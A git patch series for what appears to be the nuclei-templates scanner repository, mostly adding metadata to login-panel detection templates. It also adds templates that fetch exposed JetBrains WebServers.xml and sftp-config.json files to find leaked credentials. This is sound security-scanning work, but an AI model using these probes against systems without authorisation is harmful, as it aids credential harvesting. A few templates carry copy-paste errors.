a/exposed-panels/leostream-panel.yaml b/exposed-panels/leostream-panel.yaml index 7419ff5654..17cb41720a 100644 --- a/exposed-panels/leostream-panel.yaml +++ b/exposed-panels/leostream-panel.yaml @@ -1,11 +1,16 @@ id: leostream-panel info: - name: Leostream Panel Detect + name: Leostream Login Panel - Detect author: praetorian-thendrickson severity: info + description: Leostream login panel was detected. reference: - https://leostream.com + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"Leostream" tags: panel,leostream @@ -24,3 +29,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/28 diff --git a/exposed-panels/librenms-login.yaml b/exposed-panels/librenms-login.yaml index 73613bcbd1..ed1f68b7ed 100644 --- a/exposed-panels/librenms-login.yaml +++ b/exposed-panels/librenms-login.yaml @@ -1,9 +1,14 @@ id: librenms-login info: - name: LibreNMS Login Panel + name: LibreNMS Login Panel - Detect author: pikpikcu severity: info + description: LibreNMS login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: fofa-query: title="librenms" tags: librenms,panel @@ -23,3 +28,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/28 diff --git a/exposed-panels/liferay-portal.yaml b/exposed-panels/liferay-portal.yaml index 6695bd7c6e..8036cc8898 100644 --- a/exposed-panels/liferay-portal.yaml +++ b/exposed-panels/liferay-portal.yaml @@ -1,12 +1,17 @@ id: liferay-portal info: - name: Liferay Portal Detect + name: Liferay Login Panel - Detect author: organiccrap,dwisiswant0,ricardomaia severity: info + description: Liferay login panel was detected, reference: - https://www.liferay.com/ - https://github.com/mzer0one/CVE-2020-7961-POC + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.favicon.hash:129457226 @@ -43,3 +48,5 @@ requests: group: 2 regex: - '(i?)Liferay-Portal:.*?(\d+\.?.*?)\s' + +# Enhanced by md on 2022/11/28 diff --git a/exposed-panels/linkerd-panel.yaml b/exposed-panels/linkerd-panel.yaml index 2c74961a16..e5eeec3a13 100644 --- a/exposed-panels/linkerd-panel.yaml +++ b/exposed-panels/linkerd-panel.yaml @@ -1,11 +1,15 @@ id: linkerd-panel info: - name: Linkered Panel Exposure + name: Linkerd Panel - Detect author: tess severity: high description: | - Linkerd is a service mesh for Kubernetes. It makes running services easier and safer by giving you runtime debugging, observability, reliability, and security—all without requiring any changes to your code. + Linkerd panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: html:"data-controller-namespace" @@ -33,3 +37,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/28 diff --git a/exposed-panels/linksys-wifi-login.yaml b/exposed-panels/linksys-wifi-login.yaml index f9c33687b1..26793c25a6 100644 --- a/exposed-panels/linksys-wifi-login.yaml +++ b/exposed-panels/linksys-wifi-login.yaml @@ -1,9 +1,14 @@ id: linksys-wifi-login info: - name: Linksys Smart Wi-Fi + name: Linksys Smart Wi-Fi Login Panel - Detect author: pussycat0x severity: info + description: Linksys Smart Wi-Fi login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-dork: http.title:"Linksys Smart WI-FI" tags: tech,panel,linksys,iot @@ -26,3 +31,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/28 diff --git a/exposed-panels/livehelperchat-admin-panel.yaml b/exposed-panels/livehelperchat-admin-panel.yaml index 2bba46024e..3c0eca26c8 100644 --- a/exposed-panels/livehelperchat-admin-panel.yaml +++ b/exposed-panels/livehelperchat-admin-panel.yaml @@ -1,9 +1,14 @@ id: livehelperchat-admin-panel info: - name: Live Helper Chat Admin Panel + name: Live Helper Chat Admin Login Panel - Detect author: ritikchaddha severity: info + description: Live Helper Chat admin login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"Live Helper Chat" @@ -27,3 +32,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/28 diff --git a/exposed-panels/livezilla-login-panel.yaml b/exposed-panels/livezilla-login-panel.yaml index 33956e2e56..4a0a74b230 100644 --- a/exposed-panels/livezilla-login-panel.yaml +++ b/exposed-panels/livezilla-login-panel.yaml @@ -1,9 +1,14 @@ id: livezilla-login-panel info: - name: Livezilla login detect + name: LiveZilla Login Panel - Detect author: __Fazal severity: info + description: LiveZilla login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,livezilla,login requests: @@ -20,3 +25,5 @@ requests: - type: word words: - 'LiveZilla' + +# Enhanced by md on 2022/11/28 diff --git a/exposed-panels/logitech-harmony-portal.yaml b/exposed-panels/logitech-harmony-portal.yaml index fbe026710d..f048fe2c92 100644 --- a/exposed-panels/logitech-harmony-portal.yaml +++ b/exposed-panels/logitech-harmony-portal.yaml @@ -1,9 +1,14 @@ id: logitech-harmony-portal info: - name: Logitech Harmony Pro Installer Portal + name: Logitech Harmony Pro Installer Portal Login Panel - Detect author: ritikchaddha severity: info + description: Logitech Harmony Pro Installer Portal login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.title:"Logitech Harmony Pro Installer" @@ -24,3 +29,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/28 diff --git a/exposed-panels/looker-panel.yaml b/exposed-panels/looker-panel.yaml index db48eccd42..310c01fb0b 100644 --- a/exposed-panels/looker-panel.yaml +++ b/exposed-panels/looker-panel.yaml @@ -1,9 +1,14 @@ id: looker-panel info: - name: Looker Login Panel + name: Looker Login Panel - Detect author: ritikchaddha,daffainfo severity: info + description: Looker login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan: http.html:"lookerVersion" @@ -32,3 +37,5 @@ requests: group: 1 regex: - "lookerVersion: '([0-9.]+)'," + +# Enhanced by md on 2022/11/28 diff --git a/exposed-panels/lucee-login.yaml b/exposed-panels/lucee-login.yaml index 0f2c5cc1a1..09ba7aa553 100644 --- a/exposed-panels/lucee-login.yaml +++ b/exposed-panels/lucee-login.yaml @@ -1,9 +1,14 @@ id: lucee-login info: - name: Lucee Web/Server Administrator Login + name: Lucee Web and Lucee Server Admin Login Panel - Detect author: dhiyaneshDK severity: info + description: Lucee admin login panels were detected in both Web and Server tabs. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"Lucee" tags: panel,lucee @@ -23,3 +28,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/28 diff --git a/exposed-panels/maestro-login-panel.yaml b/exposed-panels/maestro-login-panel.yaml index 0c8155515d..2fc4e87cff 100644 --- a/exposed-panels/maestro-login-panel.yaml +++ b/exposed-panels/maestro-login-panel.yaml @@ -1,9 +1,14 @@ id: maestro-login-panel info: - name: Maestro - LuCI Login Panel + name: Maestro LuCI Login Panel - Detect author: tess severity: info + description: Maestro LuCI login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-dork: http.title:"Maestro - LuCI" @@ -28,3 +33,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/28 diff --git a/exposed-panels/magento-admin-panel.yaml b/exposed-panels/magento-admin-panel.yaml index 9c43c0555f..8c51cac254 100644 --- a/exposed-panels/magento-admin-panel.yaml +++ b/exposed-panels/magento-admin-panel.yaml @@ -1,14 +1,17 @@ id: magento-admin-panel info: - name: Exposed Magento Admin Panel + name: Magento Admin Login Panel - Detect author: TechbrunchFR,ritikchaddha severity: info description: | - As a security best practice, Magento recommends that you use a unique, custom Admin URL instead of the default admin or a common term such as backend. Although it will not directly protect your site - from a determined bad actor, it can reduce exposure to scripts that try to gain unauthorized access. + Magento admin login panel was detected. reference: - https://docs.magento.com/user-guide/stores/store-urls-custom-admin.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.component:"Magento" @@ -30,3 +33,5 @@ requests: - "Magento" - "Admin Panel" condition: and + +# Enhanced by md on 2022/11/28 diff --git a/exposed-panels/mailhog-panel.yaml b/exposed-panels/mailhog-panel.yaml index 2996bdc448..92c381465e 100644 --- a/exposed-panels/mailhog-panel.yaml +++ b/exposed-panels/mailhog-panel.yaml @@ -1,13 +1,17 @@ id: mailhog-panel info: - name: MailHog Panel Detect + name: MailHog Panel - Detect author: kh4sh3i severity: info description: | - MailHog is an email testing tool for developers + MailHog panel was detected. reference: - https://github.com/mailhog/MailHog + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.html:"mailhog" @@ -30,3 +34,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/28 diff --git a/exposed-panels/mailwatch-login.yaml b/exposed-panels/mailwatch-login.yaml index f42a3f602c..8f3d7c1fa4 100644 --- a/exposed-panels/mailwatch-login.yaml +++ b/exposed-panels/mailwatch-login.yaml @@ -1,9 +1,14 @@ id: mailwatch-login info: - name: MailWatch Login Page + name: MailWatch Login Panel - Detect author: oppsec severity: info + description: MailWatch login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.title:"MailWatch Login Page" @@ -26,3 +31,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/28 diff --git a/exposed-panels/mantisbt-panel.yaml b/exposed-panels/mantisbt-panel.yaml index faac08a841..b3dd3a83f5 100644 --- a/exposed-panels/mantisbt-panel.yaml +++ b/exposed-panels/mantisbt-panel.yaml @@ -1,11 +1,16 @@ id: mantisbt-panel info: - name: MantisBT Login Panel + name: MantisBT Login Panel - Detect author: makyotox,daffainfo severity: info + description: MantisBT login panel was detected. reference: - https://www.mantisbt.org/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.favicon.hash:662709064 @@ -28,3 +33,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/28 diff --git a/exposed-panels/matomo-login-portal.yaml b/exposed-panels/matomo-login-portal.yaml index cd65ce7f5a..39dcf78793 100644 --- a/exposed-panels/matomo-login-portal.yaml +++ b/exposed-panels/matomo-login-portal.yaml @@ -1,10 +1,14 @@ id: matomo-login-portal info: - name: Matomo Login Portal + name: Matomo Login Panel - Detect author: Arr0way severity: info - description: Matomo provides website analytics + description: Matomo logjn panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,matomo requests: @@ -22,4 +26,6 @@ requests: words: - "Sign in" - "Matomo" - condition: and \ No newline at end of file + condition: and + +# Enhanced by md on 2022/11/28 diff --git a/exposed-panels/mcloud-panel.yaml b/exposed-panels/mcloud-panel.yaml index 41c28dc8c3..38f25d2c06 100644 --- a/exposed-panels/mcloud-panel.yaml +++ b/exposed-panels/mcloud-panel.yaml @@ -1,9 +1,14 @@ id: mcloud-panel info: - name: MCloud Panel Exposure + name: mCloud Login Panel - Detect author: ritikchaddha severity: high + description: mCloud login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.title:"mcloud-installer-web" @@ -24,3 +29,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/28 diff --git a/exposed-panels/meshcentral-login.yaml b/exposed-panels/meshcentral-login.yaml index 6327f1cf0b..c79a49412d 100644 --- a/exposed-panels/meshcentral-login.yaml +++ b/exposed-panels/meshcentral-login.yaml @@ -1,9 +1,14 @@ id: meshcentral-login info: - name: MeshCentral - Login + name: MeshCentral Login Panel - Detect author: dhiyaneshDk severity: info + description: MeshCentral login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"MeshCentral - Login" tags: panel,meshcentral @@ -23,3 +28,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/28 diff --git a/exposed-panels/metabase-panel.yaml b/exposed-panels/metabase-panel.yaml index b06f3bb0a0..47c7aaf79a 100644 --- a/exposed-panels/metabase-panel.yaml +++ b/exposed-panels/metabase-panel.yaml @@ -1,10 +1,14 @@ id: metabase-panel info: - name: Metabase Login Panel + name: Metabase Login Panel - Detect author: revblock,daffainfo severity: info - description: If a Metabase instance is deployed on the target URL it will return a login page with the version number in the page source + description: Metabase login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"Metabase" tags: panel,metabase,login @@ -34,3 +38,5 @@ requests: group: 1 regex: - '"(v\d+.\d+.\d+)"' + +# Enhanced by md on 2022/11/28 diff --git a/exposed-panels/metersphere-login.yaml b/exposed-panels/metersphere-login.yaml index fe00dc59a4..39b91c62e5 100644 --- a/exposed-panels/metersphere-login.yaml +++ b/exposed-panels/metersphere-login.yaml @@ -1,11 +1,16 @@ id: metersphere-login info: - name: Metersphere Login + name: MeterSphere Login Panel - Detect author: pdteam severity: info + description: MeterSphere login panel was detected. reference: - https://github.com/metersphere/metersphere + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,metersphere requests: @@ -32,4 +37,6 @@ requests: - type: dsl dsl: - - "contains(tolower(all_headers), 'ms_session_id')" \ No newline at end of file + - "contains(tolower(all_headers), 'ms_session_id')" + +# Enhanced by md on 2022/11/28 diff --git a/exposed-panels/mfiles-web-detect.yaml b/exposed-panels/mfiles-web-detect.yaml index 99d777aae2..50b65f181b 100644 --- a/exposed-panels/mfiles-web-detect.yaml +++ b/exposed-panels/mfiles-web-detect.yaml @@ -1,11 +1,16 @@ id: mfiles-web-detect info: - name: M-Files Web Panel Detect + name: M-Files Web Login Panel - Detect author: Nodauf severity: info + description: M-Files Web login panel was detected. reference: - https://www.m-files.com/about/trust-center/security-advisories/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.html:"M-Files Web" @@ -31,3 +36,5 @@ requests: - 'M-Files user' - 'M-Files authentication' condition: or + +# Enhanced by md on 2022/11/28 diff --git a/exposed-panels/microfocus-filr-panel.yaml b/exposed-panels/microfocus-filr-panel.yaml index 781d44db0e..8ffbd9413f 100644 --- a/exposed-panels/microfocus-filr-panel.yaml +++ b/exposed-panels/microfocus-filr-panel.yaml @@ -1,9 +1,14 @@ id: microfocus-filr-panel info: - name: Micro Focus Filr Panel + name: Micro Focus Filr Login Panel - Detect author: ritikchaddha severity: info + description: Micro Focus Filr login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.html:"Micro Focus Filr" @@ -24,3 +29,5 @@ requests: - type: status status: - 404 + +# Enhanced by md on 2022/11/28 diff --git a/exposed-panels/microfocus-vibe-panel.yaml b/exposed-panels/microfocus-vibe-panel.yaml index 8e3f017757..96a7710465 100644 --- a/exposed-panels/microfocus-vibe-panel.yaml +++ b/exposed-panels/microfocus-vibe-panel.yaml @@ -1,9 +1,14 @@ id: microfocus-vibe-panel info: - name: Micro Focus Vibe Login Panel + name: Micro Focus Vibe Login Panel - Detect author: ritikchaddha severity: info + description: Micro Focus Vibe login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.html:"Micro Focus Vibe" @@ -28,3 +33,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/28 diff --git a/exposed-panels/microsoft-exchange-panel.yaml b/exposed-panels/microsoft-exchange-panel.yaml index fca701bd58..3e51d1d1cd 100644 --- a/exposed-panels/microsoft-exchange-panel.yaml +++ b/exposed-panels/microsoft-exchange-panel.yaml @@ -1,12 +1,16 @@ id: microsoft-exchange-panel info: - name: Microsoft Exchange Control Panel + name: Microsoft Exchange Admin Center Login Panel - Detect author: r3dg33k severity: info - description: Publicly accessible Microsoft Exchange Server Control Panel + description: Microsoft Exchange Admin Center login panel was detected. reference: - https://docs.microsoft.com/en-us/answers/questions/58814/block-microsoft-exchange-server-2016-exchange-admi.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: microsoft,panel,exchange requests: @@ -23,3 +27,5 @@ requests: - type: word words: - 'Exchange Admin Center' + +# Enhanced by md on 2022/11/28 diff --git a/exposed-panels/mikrotik-routeros.yaml b/exposed-panels/mikrotik-routeros.yaml index 254984ed65..7766dea048 100644 --- a/exposed-panels/mikrotik-routeros.yaml +++ b/exposed-panels/mikrotik-routeros.yaml @@ -1,11 +1,16 @@ id: mikrotik-routeros info: - name: MikroTik RouterOS Login + name: MikroTik Router OS Login Panel - Detect author: gy741 severity: info + description: MikroTik Router OS login panel was detected. reference: - https://systemweakness.com/routeros-user-with-just-ftp-policy-can-write-to-filesystem-cve-2021-27221-e3e45d780dfe + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,login requests: @@ -23,3 +28,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/28 diff --git a/exposed-panels/mini-start-page.yaml b/exposed-panels/mini-start-page.yaml index 015fa09fd5..77877e656c 100644 --- a/exposed-panels/mini-start-page.yaml +++ b/exposed-panels/mini-start-page.yaml @@ -1,11 +1,16 @@ id: mini-start-page info: - name: Miniweb Start Page + name: Miniweb Start Page Login Panel - Detect author: dhiyaneshDk severity: info + description: Miniweb Start Page login panel was detected. reference: - https://www.exploit-db.com/ghdb/6500 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: edb,panel requests: @@ -22,3 +27,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/28 diff --git a/exposed-panels/minio-browser.yaml b/exposed-panels/minio-browser.yaml index 44e2d3f49b..5a6cd68604 100644 --- a/exposed-panels/minio-browser.yaml +++ b/exposed-panels/minio-browser.yaml @@ -1,9 +1,14 @@ id: minio-browser info: - name: MinIO Browser + name: MinIO Browser Login Panel - Detect author: pikpikcu severity: info + description: MinIO Browser login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: title:"MinIO Browser" tags: panel,minio @@ -21,4 +26,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by md on 2022/11/28 From ac6c9e2b88f5ea52f2f70bc5334550d6cfd2b108 Mon Sep 17 00:00:00 2001 From: mohammedshine <34446299+mohammedshine@users.noreply.github.com> Date: Tue, 29 Nov 2022 23:16:18 +0530 Subject: [PATCH 0769/1415] Create backpack-admin-login.yaml --- .../backpack/backpack-admin-login.yaml | 26 +++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 exposed-panels/backpack/backpack-admin-login.yaml diff --git a/exposed-panels/backpack/backpack-admin-login.yaml b/exposed-panels/backpack/backpack-admin-login.yaml new file mode 100644 index 0000000000..29c84bc205 --- /dev/null +++ b/exposed-panels/backpack/backpack-admin-login.yaml @@ -0,0 +1,26 @@ +id: backpack-admin-login + +info: + name: Backpack Admin Login + author: shine + severity: info + description: An Backpack Admin dashboard was detected. + tags: backpack,admin,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/admin/login" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Login :: Backpack Admin Panel' + - 'Backpack' + condition: or + + - type: status + status: + - 200 From 3d7eea4fbbfd0e19a6909a979ccfb69fae2f4a9f Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Tue, 29 Nov 2022 20:28:18 -0500 Subject: [PATCH 0770/1415] Update jenkins-detect.yaml - Solves false positive using https://alex-jenkins.tumblr.com (more general https://*x-jenkins.tumblr.com) - Tested on 50 targets, true positives remain. --- technologies/jenkins-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/jenkins-detect.yaml b/technologies/jenkins-detect.yaml index 92b47754b2..2138b6a26d 100644 --- a/technologies/jenkins-detect.yaml +++ b/technologies/jenkins-detect.yaml @@ -26,7 +26,7 @@ requests: - type: word part: header words: - - "x-jenkins" + - "x-jenkins:" case-insensitive: true - type: word From e185c816854f992e9e4e305ad552e191e2f023a4 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 30 Nov 2022 10:22:26 +0530 Subject: [PATCH 0771/1415] Update backpack-admin-login.yaml --- exposed-panels/backpack/backpack-admin-login.yaml | 14 +++++++++----- 1 file changed, 9 insertions(+), 5 deletions(-) diff --git a/exposed-panels/backpack/backpack-admin-login.yaml b/exposed-panels/backpack/backpack-admin-login.yaml index 29c84bc205..d2dd28c4f8 100644 --- a/exposed-panels/backpack/backpack-admin-login.yaml +++ b/exposed-panels/backpack/backpack-admin-login.yaml @@ -4,8 +4,12 @@ info: name: Backpack Admin Login author: shine severity: info - description: An Backpack Admin dashboard was detected. - tags: backpack,admin,panel + description: | + An Backpack Admin dashboard was detected. + metadata: + verified: true + shodan-query: title:"Backpack Admin" + tags: panel,backpack,admin requests: - method: GET @@ -17,9 +21,9 @@ requests: - type: word part: body words: - - 'Login :: Backpack Admin Panel' - - 'Backpack' - condition: or + - 'Backpack Admin' + - 'backpack_alerts' + condition: and - type: status status: From b3cf14428b295e0433865a463d0e44b916937a4f Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 30 Nov 2022 10:38:10 +0530 Subject: [PATCH 0773/1415] Update versa-flexvnf-server.yaml --- technologies/versa-flexvnf-server.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/technologies/versa-flexvnf-server.yaml b/technologies/versa-flexvnf-server.yaml index d26d850438..dfe1f7070b 100644 --- a/technologies/versa-flexvnf-server.yaml +++ b/technologies/versa-flexvnf-server.yaml @@ -2,12 +2,13 @@ id: versa-flexvnf-server info: name: Versa FlexVNF Server - description: Versa FlexVNF Server Detection (magic request params exposes Server signature/version) author: c-sh0 severity: info + description: | + Versa FlexVNF Server Detection (magic request params exposes Server signature/version) reference: - https://versa-networks.com/products/components/ - tags: tech,versa,flexvnf,sdwan + tags: tech,versa,flexvnf requests: - method: GET @@ -18,7 +19,6 @@ requests: max-redirects: 2 matchers-condition: and matchers: - - type: word part: header words: From 18a42a3adbbf2881ccd5fcde16dd6b96d934b17c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 30 Nov 2022 12:16:51 +0530 Subject: [PATCH 0774/1415] Create jetbrains-webservers.yaml --- exposures/files/jetbrains-webservers.yaml | 43 +++++++++++++++++++++++ 1 file changed, 43 insertions(+) create mode 100644 exposures/files/jetbrains-webservers.yaml diff --git a/exposures/files/jetbrains-webservers.yaml b/exposures/files/jetbrains-webservers.yaml new file mode 100644 index 0000000000..171600663d --- /dev/null +++ b/exposures/files/jetbrains-webservers.yaml @@ -0,0 +1,43 @@ +id: jetbrains-webservers + +info: + name: Jetbrains WebServers File Exposure + author: geeknik + severity: low + description: | + Created by Jetbrains IDEs, contains webserver credentials with encoded passwords. + reference: + - https://www.exploit-db.com/ghdb/6648 + metadata: + verified: true + shodan-query: title:"Backpack Admin" + tags: jetbrains,config,edb + +requests: + - method: GET + path: + - "{{BaseURL}}/.idea/WebServers.xml" + - "{{BaseURL}}/.idea/webServers.xml" + - "{{BaseURL}}/.idea/webservers.xml" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + condition: and + + - type: word + part: header + words: + - "application/xml" + - "text/xml" + condition: or + + - type: status + status: + - 200 From 3dee93d59c567d058c4a734263f8f656778cefd8 Mon Sep 17 00:00:00 2001 From: Ricardo Maia Date: Wed, 30 Nov 2022 04:43:00 -0300 Subject: [PATCH 0775/1415] Add vbulletin-detect.yaml --- technologies/vbulletin-detect.yaml | 43 ++++++++++++++++++++++++++++++ 1 file changed, 43 insertions(+) create mode 100644 technologies/vbulletin-detect.yaml diff --git a/technologies/vbulletin-detect.yaml b/technologies/vbulletin-detect.yaml new file mode 100644 index 0000000000..fef9e3dc79 --- /dev/null +++ b/technologies/vbulletin-detect.yaml @@ -0,0 +1,43 @@ +id: vbulletin-detect + +info: + name: vBulletin Detect + author: ricardomaia + severity: info + description: vBulletin is a proprietary forum and community publishing software written in PHP. + + metadata: + verified: true + build-with-query: https://trends.builtwith.com/websitelist/vBulletin + google-query: intext:"Powered By vBulletin" + + reference: + - https://www.vbulletin.com/ + tags: tech,vbulletin + +requests: + - method: GET + path: + - "{{BaseURL}}" + redirects: true + max-redirects: 2 + stop-at-first-match: true + matchers-condition: or + matchers: + - type: regex + regex: + - "(?i)meta.name=.generator.*content=.vBulletin" + - '(?i)\*.vBulletin.([\d.|\d]+).CSS' + condition: or + - type: word + case-insensitive: true + words: + - "Powered By vBulletin" + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)meta.name=.generator.*content=.vbulletin.([\d.|\d]+)' + - '(?i)\*.vBulletin.([\d.|\d]+).CSS' From 0ac5bdb15b594f01ea0461ad4e19be1bbfa70fa5 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 30 Nov 2022 13:19:00 +0530 Subject: [PATCH 0776/1415] Create sftp-config.yaml --- exposures/configs/sftp-config.yaml | 32 ++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 exposures/configs/sftp-config.yaml diff --git a/exposures/configs/sftp-config.yaml b/exposures/configs/sftp-config.yaml new file mode 100644 index 0000000000..13274c7352 --- /dev/null +++ b/exposures/configs/sftp-config.yaml @@ -0,0 +1,32 @@ +id: sftp-config + +info: + name: SFTP Config File Disclosure + author: geeknik + severity: high + reference: + - https://blog.sucuri.net/2012/11/psa-sftpftp-password-exposure-via-sftp-config-json.html + - https://www.acunetix.com/vulnerabilities/web/sftp-ftp-credentials-exposure/ + - https://codexns.io/products/sftp_for_sublime/settings + metadata: + verified: true + github-query: filename:sftp-config.json + tags: sftp,config,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/sftp-config.json" + + matchers-condition: and + matchers: + - type: word + words: + - '"host":' + - '"user":' + - 'password":' + condition: and + + - type: status + status: + - 200 From bd576a8819920f236b0dd2b184a852f7cee312cb Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 30 Nov 2022 13:25:26 +0530 Subject: [PATCH 0777/1415] Update vbulletin-detect.yaml --- technologies/vbulletin-detect.yaml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/technologies/vbulletin-detect.yaml b/technologies/vbulletin-detect.yaml index fef9e3dc79..001573c8f8 100644 --- a/technologies/vbulletin-detect.yaml +++ b/technologies/vbulletin-detect.yaml @@ -5,23 +5,21 @@ info: author: ricardomaia severity: info description: vBulletin is a proprietary forum and community publishing software written in PHP. - + reference: + - https://www.vbulletin.com/ metadata: verified: true build-with-query: https://trends.builtwith.com/websitelist/vBulletin google-query: intext:"Powered By vBulletin" - - reference: - - https://www.vbulletin.com/ tags: tech,vbulletin requests: - method: GET path: - "{{BaseURL}}" - redirects: true + + host-redirects: true max-redirects: 2 - stop-at-first-match: true matchers-condition: or matchers: - type: regex @@ -29,10 +27,12 @@ requests: - "(?i)meta.name=.generator.*content=.vBulletin" - '(?i)\*.vBulletin.([\d.|\d]+).CSS' condition: or + - type: word case-insensitive: 